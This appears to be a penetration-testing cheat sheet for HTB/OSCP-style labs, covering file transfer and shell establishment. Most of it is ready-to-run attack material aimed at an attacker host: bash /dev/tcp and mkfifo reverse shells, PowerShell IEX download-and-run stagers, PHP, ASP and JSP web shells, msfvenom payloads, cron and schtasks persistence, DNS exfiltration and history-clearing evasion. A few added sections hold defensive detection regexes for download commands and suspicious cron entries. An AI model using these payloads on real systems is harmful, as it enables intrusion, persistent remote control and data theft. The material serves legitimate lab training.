# File Transfer Techniques

Alternative methods when HTTP servers are blocked or unreliable.

## Environment Setup

```bash
export ATTACKER_IP=10.10.14.X
export TARGET_IP=10.10.10.X
export LPORT=4444
```
## Method 1: Netcat File Transfer (Most Reliable)

Start the receiver before the sender. `-w 3` times the connection out after three seconds of inactivity, so the sender exits on its own once the file has gone across.

### Upload File to Target

```bash
# On attacker (sender)
nc -w 3 $TARGET_IP $LPORT < file.exe
# On target (receiver) - start this one first
nc -nlvp $LPORT > file.exe
```

### Download File from Target

```bash
# On target (sender)
nc -w 3 $ATTACKER_IP $LPORT < sensitive_file.txt
# On attacker (receiver) - start this one first
nc -nlvp $LPORT > sensitive_file.txt
```

### Verify Transfer

```bash
# Check file size and hash on both ends
ls -la file.exe
md5sum file.exe
```
## Method 2: Base64 Encoding (Firewall Bypass)

### Small Files (< 1MB)

```bash
# On attacker - encode file
base64 -w 0 file.exe
# Copy output, then on target - decode
echo "BASE64_CONTENT_HERE" | base64 -d > file.exe
```

### Large Files (Chunking)

```bash
# On attacker - split and encode
split -b 50000 file.exe chunk_
for chunk in chunk_*; do base64 -w 0 $chunk > $chunk.b64; done
# On target - decode and reassemble (chunk names sort in file order: chunk_aa, chunk_ab, ...)
echo "CHUNK1_BASE64" | base64 -d > chunk_aa
echo "CHUNK2_BASE64" | base64 -d > chunk_ab
cat chunk_* > file.exe
```
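The chunking procedure above leaves the two error-prone steps (reassembling in the right order, and proving the result is byte-identical) to the operator. The script below is an added example, not part of the original cheat sheet: it wraps the same `split`/`base64` steps in functions, uses numeric chunk suffixes so glob order is file order, and returns a SHA-256 digest the sender passes along so the receiver can verify the reassembled file. Only GNU coreutils (`split`, `base64`, `sha256sum`) are assumed; the function names, chunk directory layout and chunk size are this example's choices.

```shell
#!/bin/sh
# Added example: chunked base64 transfer with integrity verification.
# Assumes GNU coreutils (split -d, base64 -w 0, sha256sum).

CHUNK_BYTES=50000   # same chunk size the cheat sheet uses for split -b

# Sender side: split a file into fixed-size chunks and base64-encode each one.
# -d gives numeric suffixes (chunk_00, chunk_01, ...) so the receiver's glob
# order is the file order; -w 0 makes each chunk a single line that survives
# copy/paste through a shell. Prints the SHA-256 of the source on stdout.
encode_chunks() {   # $1 = source file, $2 = output directory for .b64 chunks
    mkdir -p "$2"
    split -b "$CHUNK_BYTES" -d "$1" "$2/chunk_"
    for c in "$2"/chunk_*; do
        case "$c" in *.b64) continue ;; esac   # guard against re-running on the same dir
        base64 -w 0 "$c" > "$c.b64"
        rm "$c"
    done
    sha256sum "$1" | cut -d' ' -f1
}

# Receiver side: decode every chunk in name order and append it to the output.
decode_chunks() {   # $1 = directory of .b64 chunks, $2 = reassembled output file
    : > "$2"
    for c in "$1"/chunk_*.b64; do
        base64 -d "$c" >> "$2"
    done
}

# Compare the receiver's digest with the one the sender published.
# Exit status 0 on match, 1 on mismatch (truncated, reordered or corrupted chunks).
verify_sha256() {   # $1 = file, $2 = expected hex digest
    actual=$(sha256sum "$1" | cut -d' ' -f1)
    [ "$actual" = "$2" ]
}
```

Typical use: `digest=$(encode_chunks file.exe chunks)`, paste each `chunks/chunk_NN.b64` across, then `decode_chunks chunks file.exe && verify_sha256 file.exe "$digest"`. SHA-256 is used rather than MD5 because the digest is the only evidence that the pasted chunks arrived intact.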
## Method 3: SMB Shares (Windows Targets)

### Setup SMB Server (Attacker)

```bash
# Simple SMB share
impacket-smbserver share . -smb2support
# With authentication (more reliable)
impacket-smbserver share . -smb2support -username user -password pass
```

### Access from Windows Target

```cmd
# Anonymous access
net use \\$ATTACKER_IP\share
copy \\$ATTACKER_IP\share\file.exe C:\temp\
# With authentication
net use \\$ATTACKER_IP\share /user:user pass
copy \\$ATTACKER_IP\share\file.exe C:\temp\
```
## Method 4: Native OS Tools

### Windows PowerShell

```powershell
# Download file (DownloadFile writes straight to disk and returns nothing, so there is nothing to IEX)
(New-Object Net.WebClient).DownloadFile('http://$ATTACKER_IP/file.exe','C:\temp\file.exe')
# Alternative PowerShell
Invoke-WebRequest -Uri http://$ATTACKER_IP/file.exe -OutFile C:\temp\file.exe
# PowerShell one-liner
powershell -c "(New-Object System.Net.WebClient).DownloadFile('http://$ATTACKER_IP/file.exe','file.exe')"
```

### Windows Certutil

```cmd
# Download using certutil
certutil -urlcache -split -f http://$ATTACKER_IP/file.exe file.exe
# Remove the cached copy afterwards
certutil -urlcache -split -f http://$ATTACKER_IP/file.exe delete
```

### Linux wget/curl

```bash
# Using wget
wget http://$ATTACKER_IP/file -O file
# Using curl
curl http://$ATTACKER_IP/file -o file
# With custom User-Agent (bypass filtering)
curl -A "Mozilla/5.0" http://$ATTACKER_IP/file -o file
```
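Every native download tool listed above leaves a distinctive command line in process-creation telemetry (Sysmon event 1, auditd `execve`, EDR), which is exactly what detection rules key on. The script below is an added example, not part of the original cheat sheet: it runs one pattern set over constructed process-creation log lines and reports the ones matching the download techniques in this section. The log format (`<timestamp> <host> <user> <command line>`), the sample lines and the function names are assumptions made for the example.

```shell
#!/bin/sh
# Added example: flag process command lines matching the download techniques
# above. Log lines are constructed for this example; real sources would be
# Sysmon EID 1, auditd execve records or an EDR's process table.

# One ERE per technique: certutil cache download, .NET WebClient downloads,
# Invoke-WebRequest (long and short form), and wget/curl pulling from a bare IP.
PATTERNS='certutil(\.exe)?[^|]*-urlcache|DownloadFile\(|DownloadString\(|Invoke-WebRequest|\biwr\b|(wget|curl)[^|]* https?://[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+'

# Print every matching log line (case-insensitive, since Windows tooling is not case-sensitive).
flag_downloads() {   # $1 = log file
    grep -Ei "$PATTERNS" "$1"
}

# Number of flagged lines, for alert thresholds or a quick sanity check.
count_flagged() {   # $1 = log file
    flag_downloads "$1" | wc -l | tr -d ' '
}

# Constructed sample: two benign lines, one benign certutil use, four downloads.
SAMPLE_LOG=$(mktemp)
cat > "$SAMPLE_LOG" <<'EOF'
2024-01-01T10:00:01Z host1 alice C:\Windows\System32\notepad.exe report.txt
2024-01-01T10:00:05Z host1 svc certutil.exe -urlcache -split -f http://10.10.14.5/file.exe file.exe
2024-01-01T10:00:09Z host2 bob powershell -c "(New-Object Net.WebClient).DownloadFile('http://10.10.14.5/file.exe','C:\temp\file.exe')"
2024-01-01T10:00:12Z host2 bob certutil.exe -hashfile C:\temp\report.pdf SHA256
2024-01-01T10:00:20Z host3 www-data curl -A "Mozilla/5.0" http://10.10.14.5/file -o /tmp/file
2024-01-01T10:00:25Z host3 www-data curl https://deb.debian.org/debian/dists/stable/Release -o Release
2024-01-01T10:00:30Z host1 alice powershell -c "iwr http://10.10.14.5/file.exe -OutFile file.exe"
EOF

flag_downloads "$SAMPLE_LOG"
```

The `certutil -hashfile` line and the `curl` fetch from a package mirror are deliberately left unflagged: matching on `certutil` or `curl` alone would drown the signal in legitimate administration, so the patterns anchor on the cache-download switch and on URLs that point at a bare IP address.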
## Method 5: HTTP Alternatives

### Multiple Port Options

```bash
# Try different ports if 8000 is blocked
python3 -m http.server 8080
python3 -m http.server 9000
python3 -m http.server 443
# Bind to specific interface
python3 -m http.server 8080 --bind $ATTACKER_IP
```

### HTTPS Server (Bypass Filtering)

```bash
# Generate self-signed certificate (key and cert both written to server.pem)
openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes
# Start HTTPS server (ssl.wrap_socket was removed in Python 3.12; an SSLContext works on every 3.x)
python3 -c "
import http.server, ssl, socketserver
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.load_cert_chain('server.pem')
httpd = socketserver.TCPServer(('', 443), http.server.SimpleHTTPRequestHandler)
httpd.socket = ctx.wrap_socket(httpd.socket, server_side=True)
httpd.serve_forever()
"
```

### FTP Server Alternative

```bash
# Start FTP server
python3 -m pyftpdlib -p 21 -w
# Download from target
wget ftp://$ATTACKER_IP/file.exe
```
## Method 6: SSH/SCP (If Available)

### SCP File Transfer

```bash
# Upload to target
scp file.exe user@$TARGET_IP:/tmp/
# Download from target
scp user@$TARGET_IP:/tmp/sensitive_file.txt .
# With custom port
scp -P 2222 file.exe user@$TARGET_IP:/tmp/
```

### SSH Tunneling for HTTP

```bash
# Create SSH tunnel: -L maps local port 8080 to port 8080 on the target's loopback
# (to expose the attacker's own HTTP server to the target, use -R instead)
ssh -L 8080:localhost:8080 user@$TARGET_IP
# Access local HTTP server through tunnel
```
## Method 7: Network Pivoting & Tunneling

### Ligolo-ng (Preferred Pivoting Tool)

```bash
# On attacker machine - start proxy
./proxy -selfcert
# On target machine - connect agent
./agent -connect $ATTACKER_IP:11601 -ignore-cert
# In ligolo session - select the agent and start the tunnel
session
start
# Add route to target network (on the attacker; TARGET_NETWORK is a placeholder)
ip route add TARGET_NETWORK/24 dev ligolo
```

### SSH Tunneling (Alternative)

```bash
# Local port forwarding
ssh -L 8080:internal_host:80 user@pivot_host
# Dynamic SOCKS proxy
ssh -D 9050 user@pivot_host
```
## Method 8: DNS Exfiltration (Stealth)

### Small Data Exfiltration

```bash
# Encode data in DNS queries (attacker listening)
nslookup $(echo "data" | base64).attacker-domain.com
# Use dnscat2 for larger transfers
dnscat2-server attacker-domain.com
```

Note: the DNS method is complex and slow; use it only when other methods fail.
## Troubleshooting Common Issues

### HTTP Server Blocked

- Try different ports (8080, 9000, 443)
- Use HTTPS server instead of HTTP
- Switch to SMB share method
- Use base64 encoding over existing shell

### File Corruption

- Compare file sizes before/after transfer
- Verify MD5 hashes: `md5sum file.exe`
- Check binary mode transfers
- Avoid shell interpretation (use base64 for binaries)

### Large File Transfers

- Chunk files into smaller pieces
- Use compression (`gzip file.exe`) before transfer
- Stream directly with netcat instead of storing
- Consider multiple parallel transfers

### Network Restrictions

- Test connectivity to different ports first
- Use reverse connections (target connects to attacker)
- Try UDP instead of TCP where possible
- Encode traffic to avoid detection
## File Transfer Verification

### Always Verify Transfers

```bash
# Check file size (Linux / Windows)
ls -la file.exe
dir file.exe
# Verify hash integrity (Linux / Windows)
md5sum file.exe
certutil -hashfile file.exe MD5
# Test file functionality
file file.exe
./file.exe --help
```
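The digest printed on one side rarely arrives in the same shape as the digest computed on the other: `md5sum` appends the filename, older `certutil -hashfile` builds (Windows 7 / Server 2008 era) print the digest as space-separated byte pairs, and newer ones print it on its own line between two status lines. The script below is an added example, not part of the original cheat sheet: it normalises any of those forms to bare lowercase hex, compares sizes first (a truncated transfer is the usual failure) and then the digest. The function names and the sample strings are this example's own; `md5sum`, `sha256sum`, `awk` and `wc` are assumed to be available on the side doing the check.

```shell
#!/bin/sh
# Added example: compare a hash copied from the other host (md5sum, sha256sum
# or certutil -hashfile output) with the local copy of the transferred file.

# Reduce any tool output to lowercase hex with no whitespace. Accepted shapes:
#   "d41d8cd9...  file.exe"             md5sum / sha256sum
#   "d4 1d 8c d9 ..."                    certutil -hashfile, older Windows
#   "MD5 hash of file.exe:\nD41D...\nCertUtil: -hashfile command completed successfully."
# A token of 32+ hex chars wins; otherwise two-char hex tokens are joined.
normalize_hash() {   # $1 = raw hash string, may span several lines
    printf '%s\n' "$1" | tr -d '\r' | awk '
        {
            for (i = 1; i <= NF; i++) {
                if ($i ~ /^[0-9A-Fa-f]+$/) {
                    if (length($i) >= 32) { print tolower($i); done = 1; exit }
                    if (length($i) == 2) pairs = pairs $i
                }
            }
        }
        END { if (!done && pairs != "") print tolower(pairs) }'
}

# Size check: $2 is the byte count reported by ls -l or dir on the sending side.
same_size() {   # $1 = local file, $2 = expected size in bytes
    [ "$(wc -c < "$1" | tr -d ' ')" -eq "$2" ]
}

# Digest check. Exit status 0 when the normalised expected digest equals the
# local one, 1 on mismatch or unparseable input, 2 on an unknown algorithm.
verify_transfer() {   # $1 = local file, $2 = digest string from the other host, $3 = md5|sha256
    expected=$(normalize_hash "$2")
    case "$3" in
        md5)    actual=$(md5sum "$1" | cut -d' ' -f1) ;;
        sha256) actual=$(sha256sum "$1" | cut -d' ' -f1) ;;
        *)      echo "unknown algorithm: $3" >&2; return 2 ;;
    esac
    [ -n "$expected" ] && [ "$expected" = "$actual" ]
}
```

Usage: `verify_transfer file.exe "$(cat pasted_hash.txt)" md5 && echo OK`. MD5 is adequate for spotting accidental corruption, which is the purpose here; it is not a defence against a deliberately substituted file, for which the digest would also have to travel over a trusted channel.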
## Quick Reference Commands

### Windows Targets

```cmd
# PowerShell download (-OutFile spelled out: a bare -o is ambiguous with -OutVariable/-OutBuffer)
powershell -c "iwr http://$ATTACKER_IP/file.exe -OutFile file.exe"
# Certutil download
certutil -urlcache -f http://$ATTACKER_IP/file.exe file.exe
# SMB copy
copy \\$ATTACKER_IP\share\file.exe .
```

### Linux Targets

```bash
# Wget download
wget http://$ATTACKER_IP/file
# Curl download
curl http://$ATTACKER_IP/file -o file
# Netcat upload
nc $ATTACKER_IP $LPORT < file
```

### Universal Methods

```bash
# Base64 transfer (any OS)
base64 -w 0 file | nc $TARGET_IP $LPORT
# Netcat transfer (any OS)
nc -nlvp $LPORT > file    # receiver
nc $TARGET_IP $LPORT < file    # sender
```
# Shell Establishment Techniques

Methods for establishing initial access and maintaining command execution.

## Environment Variables

```bash
export ATTACKER_IP=10.10.14.X
export TARGET_IP=10.10.10.X
export LPORT=4444
export RPORT=5555
```

## Method 1: Reverse Shells

### Linux

```bash
# Busybox nc -e
busybox nc $ATTACKER_IP $LPORT -e sh
# Standard bash reverse shell
bash -i >& /dev/tcp/$ATTACKER_IP/$LPORT 0>&1
# mkfifo + nc (for nc builds without -e)
rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc $ATTACKER_IP $LPORT > /tmp/f
# File-descriptor based sh reverse shell
0<&196;exec 196<>/dev/tcp/$ATTACKER_IP/$LPORT; sh <&196 >&196 2>&196
```
## Method 2: PowerShell Shells (Windows)

### PowerShell Reverse Shells

```powershell
# Nishang PowerShell Shells
powershell "IEX(New-Object Net.WebClient).DownloadString('http://$ATTACKER_IP/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress $ATTACKER_IP -Port $LPORT"
# Base64 encoded Nishang shell (bypass execution policy)
# -EncodedCommand expects UTF-16LE, which is why the bytes come from Encoding.Unicode
$command = "IEX(New-Object Net.WebClient).DownloadString('http://$ATTACKER_IP/shell.ps1')"
$bytes = [System.Text.Encoding]::Unicode.GetBytes($command)
$encodedCommand = [Convert]::ToBase64String($bytes)
powershell -EncodedCommand $encodedCommand
```
## Method 3: Nishang Framework

### Nishang Setup

```bash
# Clone Nishang repository
git clone https://github.com/samratashok/nishang.git
cd nishang/Shells
# Modify Invoke-PowerShellTcp.ps1 (add at the end)
Invoke-PowerShellTcp -Reverse -IPAddress $ATTACKER_IP -Port $LPORT
```

### Key Nishang Shells

- TCP reverse shell: `Invoke-PowerShellTcp.ps1`
- UDP reverse shell: `Invoke-PowerShellUdp.ps1`
- ICMP reverse shell (stealth): `Invoke-PowerShellIcmp.ps1`
- HTTP/HTTPS shells: `Invoke-PsGcat.ps1` (Gmail-based)

### Nishang Web Delivery

```powershell
# Host modified shell (on attacker)
python3 -m http.server 80
# Execute on target
powershell -c "IEX(New-Object Net.WebClient).DownloadString('http://$ATTACKER_IP/Invoke-PowerShellTcp.ps1')"
# Alternative execution methods
powershell -c "IWR -UseBasicParsing http://$ATTACKER_IP/shell.ps1|IEX"
powershell -c "$h=new-object -com WScript.Shell;$h.run('cmd /c powershell -c IEX(New-Object Net.WebClient).DownloadString(''http://$ATTACKER_IP/shell.ps1'')')"
```
## Method 4: Bind Shells

### Linux Bind Shells

```bash
# Netcat bind shell
nc -nlvp $LPORT -e /bin/bash
# Netcat without -e flag
rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash 2>&1 | nc -nlvp $LPORT > /tmp/f
# Python bind shell (the outer single quotes stop the shell from expanding $LPORT, so write the port number literally)
python3 -c 'exec("""import socket as s,subprocess as sp;s1=s.socket(s.AF_INET,s.SOCK_STREAM);s1.setsockopt(s.SOL_SOCKET,s.SO_REUSEADDR, 1);s1.bind(("0.0.0.0",$LPORT));s1.listen(1);c,a=s1.accept();\nwhile True: d=c.recv(1024).decode();p=sp.Popen(d,shell=True,stdout=sp.PIPE,stderr=sp.PIPE,stdin=sp.PIPE);c.sendall(p.stdout.read()+p.stderr.read())""")'
```

### Windows Bind Shells

```powershell
# PowerShell bind shell
powershell -c "$listener = [System.Net.Sockets.TcpListener]$LPORT; $listener.start();$client = $listener.AcceptTcpClient();$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();$listener.Stop()"
# Connect to bind shell (from attacker)
nc $TARGET_IP $LPORT
```
## Method 5: Web Shells

### PHP Web Shells

Simple PHP shell:

```php
<?php system($_GET['cmd']); ?>
```

More advanced PHP shell:

```php
<?php
if(isset($_REQUEST['cmd'])){
    echo "<pre>";
    $cmd = ($_REQUEST['cmd']);
    system($cmd);
    echo "</pre>";
    die;
}
?>
```

PHP reverse shell (pentestmonkey): upload php-reverse-shell.php and access it via the browser.

### ASP/ASPX Web Shells

Simple ASP shell:

```asp
<%eval request("cmd")%>
```

Simple ASPX shell:

```aspx
<%@ Page Language="C#" %>
<% Response.Write(System.Diagnostics.Process.Start("cmd.exe","/c " + Request["cmd"]).StandardOutput.ReadToEnd()); %>
```

### JSP Web Shells

Simple JSP shell:

```jsp
<%@ page import="java.util.*,java.io.*"%>
<%
if (request.getParameter("cmd") != null) {
    out.println("Command: " + request.getParameter("cmd") + "<BR>");
    Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
    OutputStream os = p.getOutputStream();
    InputStream in = p.getInputStream();
    DataInputStream dis = new DataInputStream(in);
    String disr = dis.readLine();
    while ( disr != null ) {
        out.println(disr);
        disr = dis.readLine();
    }
}
%>
```
## Method 6: MSFVenom Payloads

### Linux Payloads

```bash
# Linux reverse shell
msfvenom -p linux/x86/shell_reverse_tcp LHOST=$ATTACKER_IP LPORT=$LPORT -f elf > shell.elf
# Linux bind shell
msfvenom -p linux/x86/shell_bind_tcp LPORT=$LPORT -f elf > bind.elf
# Linux meterpreter
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=$ATTACKER_IP LPORT=$LPORT -f elf > met.elf
```

### Windows Payloads

```bash
# Windows reverse shell
msfvenom -p windows/shell_reverse_tcp LHOST=$ATTACKER_IP LPORT=$LPORT -f exe > shell.exe
# Windows meterpreter
msfvenom -p windows/meterpreter/reverse_tcp LHOST=$ATTACKER_IP LPORT=$LPORT -f exe > met.exe
# Windows bind shell
msfvenom -p windows/shell_bind_tcp LPORT=$LPORT -f exe > bind.exe
# PowerShell payload
msfvenom -p windows/powershell_reverse_tcp LHOST=$ATTACKER_IP LPORT=$LPORT -f raw > shell.ps1
```
## Method 7: Shell Upgrade Techniques

### TTY Shell Upgrade (Linux)

```bash
# Python PTY
python3 -c 'import pty; pty.spawn("/bin/bash")'
python -c 'import pty; pty.spawn("/bin/bash")'
# Fully interactive TTY
python3 -c 'import pty; pty.spawn("/bin/bash")'
# Press Ctrl+Z to background the shell, then run this in the attacker's terminal
stty raw -echo; fg
# Press Enter twice
export TERM=xterm
```

### PowerShell Shell Enhancement

```powershell
# Get full PowerShell session
powershell -nop -ep bypass
# Import PowerShell modules
Import-Module ActiveDirectory
Import-Module ServerManager
# Enable PowerShell remoting
Enable-PSRemoting -Force
```
## Method 8: Persistence Mechanisms

### Linux Cron Jobs

```bash
# Add reverse shell to crontab (crontab - replaces the user's existing crontab wholesale)
echo "* * * * * /bin/bash -c 'bash -i >& /dev/tcp/$ATTACKER_IP/$LPORT 0>&1'" | crontab -
# System-wide cron job (/etc/crontab lines carry a user field before the command)
echo "* * * * * root /bin/bash -c 'bash -i >& /dev/tcp/$ATTACKER_IP/$LPORT 0>&1'" >> /etc/crontab
```
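Cron entries of the kind shown above are also among the first things an incident responder checks, and the two crontab layouts (per-user tables with five schedule fields, `/etc/crontab` and `/etc/cron.d` with an extra user field) trip up naive greps. The script below is an added example, not part of the original cheat sheet: it parses both layouts, skips comments and environment assignments, and flags commands carrying the indicators used in this section (`/dev/tcp`, netcat variants, FIFO-based shells, decode-and-run stagers, pipe-to-shell downloads). The sample crontabs are constructed for the example; the function names and the `system` marker are this example's conventions.

```shell
#!/bin/sh
# Added example: audit crontab files for reverse-shell style persistence.
# Input layout follows crontab(5); sample files are constructed in the usage below.

# Indicators worth a second look inside a cron command.
SUSPICIOUS='/dev/tcp/|(^|[^a-z])(nc|ncat|netcat)([^a-z]|$)|mkfifo|base64 (-d|--decode)|(curl|wget)[^|]*\|[ ]*(ba)?sh'

# Print "<user>\t<schedule>\t<command>" for each suspicious entry.
# $2 is the owning user for a per-user crontab, or the literal word "system"
# for /etc/crontab and /etc/cron.d files, whose lines carry a user field.
audit_crontab() {   # $1 = crontab file, $2 = user | system
    awk -v who="$2" '
        /^[[:space:]]*(#|$)/ { next }          # comments and blank lines
        /^[[:space:]]*[A-Za-z_]+=/ { next }    # SHELL=, PATH=, MAILTO= assignments
        {
            nsched = ($1 ~ /^@/) ? 1 : 5       # @reboot/@hourly shorthand is a single field
            user = who
            start = nsched + 1
            if (who == "system") { user = $(nsched + 1); start = nsched + 2 }
            sched = ""; for (i = 1; i <= nsched; i++) sched = sched ((i > 1) ? " " : "") $i
            cmd = ""; for (i = start; i <= NF; i++) cmd = cmd ((i > start) ? " " : "") $i
            print user "\t" sched "\t" cmd
        }' "$1" | grep -Ei "$SUSPICIOUS"
}

# Count of flagged entries (0 when the file is clean).
count_suspicious_cron() {   # $1 = crontab file, $2 = user | system
    audit_crontab "$1" "$2" | wc -l | tr -d ' '
}

# Constructed per-user crontab: one backup job, one reverse shell, one @reboot script.
USER_CRON=$(mktemp)
cat > "$USER_CRON" <<'EOF'
# m h dom mon dow command
MAILTO=""
0 3 * * * /usr/bin/rsync -a /srv/data /backup/
* * * * * /bin/bash -c 'bash -i >& /dev/tcp/10.10.14.5/4444 0>&1'
@reboot /usr/local/bin/healthcheck.sh
EOF

# Constructed /etc/crontab: stock Debian hourly line plus two planted entries.
SYSTEM_CRON=$(mktemp)
cat > "$SYSTEM_CRON" <<'EOF'
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin
17 * * * * root cd / && run-parts --report /etc/cron.hourly
* * * * * root /bin/bash -c 'bash -i >& /dev/tcp/10.10.14.5/4444 0>&1'
*/5 * * * * www-data curl -s http://10.10.14.5/x.sh | sh
EOF

audit_crontab "$USER_CRON" alice
audit_crontab "$SYSTEM_CRON" system
```

On a live host the same functions run over `crontab -l -u "$u"` output for each user and over `/etc/crontab` and `/etc/cron.d/*` with the `system` marker; the netcat pattern is bracketed by non-letters so that `rsync` and `run-parts` do not trigger it.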
### Windows Scheduled Tasks

```cmd
# Create scheduled task for reverse shell
schtasks /create /tn "SystemUpdate" /tr "powershell -c IEX(New-Object Net.WebClient).DownloadString('http://$ATTACKER_IP/shell.ps1')" /sc minute /mo 5
# Create service for persistence
sc create evil binpath= "cmd.exe /c powershell -c IEX(New-Object Net.WebClient).DownloadString('http://$ATTACKER_IP/shell.ps1')"
```
## Method 9: Alternative Shells

### Socat Shells

```bash
# Socat reverse shell (Linux)
socat TCP:$ATTACKER_IP:$LPORT EXEC:/bin/bash
# Socat bind shell (Linux)
socat TCP-LISTEN:$LPORT,reuseaddr,fork EXEC:/bin/bash,pty,stderr,setsid,sigint,sane
# Socat encrypted shell
# Generate certificate: openssl req -newkey rsa:2048 -nodes -keyout shell.key -x509 -days 362 -out shell.crt
# Combine: cat shell.key shell.crt > shell.pem
socat OPENSSL-LISTEN:$LPORT,cert=shell.pem,verify=0,fork EXEC:/bin/bash
```

### OpenSSL Shells

```bash
# Generate SSL certificate
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
# SSL reverse shell (attacker listener)
openssl s_server -quiet -key key.pem -cert cert.pem -port $LPORT
# SSL reverse shell (target)
mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect $ATTACKER_IP:$LPORT > /tmp/s; rm /tmp/s
```
## Shell Listener Setup

### Netcat Listeners

```bash
# Basic netcat listener
nc -nlvp $LPORT
# Netcat with logging
nc -nlvp $LPORT | tee shell.log
# Multiple connection support
while true; do nc -nlvp $LPORT; done
```

### Metasploit Listeners

```bash
# Start msfconsole
msfconsole -q
# Multi handler
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST $ATTACKER_IP
set LPORT $LPORT
exploit -j
```

### Socat Listeners

```bash
# Basic socat listener
socat file:`tty`,raw,echo=0 TCP-LISTEN:$LPORT
# SSL client side: connects to the socat OPENSSL-LISTEN bind shell from Method 9
socat OPENSSL:$TARGET_IP:$LPORT,verify=0 -
```
## Troubleshooting Shell Issues

### Common Problems

- Shell dies immediately: check firewall rules, try different ports
- No TTY: upgrade the shell using Python PTY or other methods
- Limited commands: try different shell types (sh, bash, cmd, powershell)
- Connection filtered: use encrypted shells (SSL/TLS) or alternative protocols

### Shell Stabilization

```bash
# Set proper terminal
export TERM=xterm
# Set terminal size
stty rows 38 columns 116
# Keep the session out of the shell history file
export HISTFILE=/dev/null
set +o history
```
## Integration with File Transfer

### Shell + File Transfer Workflow

```bash
# 1. Establish initial shell
nc -nlvp $LPORT
# 2. Upgrade shell for file transfer
python3 -c 'import pty; pty.spawn("/bin/bash")'
# 3. Transfer tools using established methods
wget http://$ATTACKER_IP/linpeas.sh
# 4. Execute and exfiltrate results
./linpeas.sh | nc $ATTACKER_IP $RPORT
```

### File Transfer in Restricted Shells

```bash
# Use base64 when shell has limitations
base64 -w 0 /path/to/file
# Copy output and decode on attacker machine
```

## Next Steps

Once file transfer is established:

- Upload enumeration tools (LinPEAS, WinPEAS)
- Download sensitive files for analysis
- Transfer exploit payloads for privilege escalation
- Backup important findings before making changes